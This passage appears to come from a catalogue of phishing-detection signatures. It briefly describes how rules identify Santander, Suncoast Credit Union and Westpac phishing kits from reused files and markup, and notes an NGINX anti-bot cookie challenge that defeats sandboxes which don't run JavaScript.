Detects a Santander phishing kit using the same stylesheet filename on each domain, also includes an indicator referring to a `div` element's `id` attribute as "shittymodal".

Suncoast Credit Union Phishing Kit 4c74e401

Detects a Suncoast Credit Union phishing kit that uses the same commented out JS and static VIcurrentDateTime value on all domains.

testcookie NGINX anti-bot

`testcookie-nginx-module` is a basic anti-bot mechanism using a JavaScript-based challenge to defeat simple analysis by sandboxes which don't evaluate JavaScript.

Westpac phishing kit c5c1bfe0

Westpac phishing kit which uses the same CSS files and directory structure across various domains.